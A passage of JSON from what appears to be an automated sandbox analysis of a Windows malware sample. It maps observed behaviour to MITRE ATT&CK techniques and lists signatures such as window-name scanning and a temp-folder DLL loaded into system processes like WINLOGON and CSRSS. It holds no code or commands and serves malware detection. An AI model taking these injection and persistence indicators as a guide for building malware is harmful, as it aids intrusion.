"https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"RegEdit_RegEdit\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for window \"Registry Editor\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for window \"Folder Options\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for window \"Local Settings\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"ExploreWClass\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"CabinetWClass\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"RebarWindow32\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"ComboBoxEx32\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"ComboBox\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"Edit\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"KERNEL32\" at base 77cc0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"SHELL32.DLL\" at base 76460000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"OLE32.DLL\" at base 77260000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"USER32\" at base 75eb0000\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 77cc0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 76460000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 77260000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"D3_08.exe\" loaded module \"USER32\" at base 75eb0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75970000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 77cc0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76460000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 77260000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 75eb0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 77cc0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76460000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 77260000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 75eb0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 77cc0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76460000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 77260000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 75970000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76460000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 77260000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 75eb0000\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 77cc0000\n \"SERVICES.EXE\" loaded module 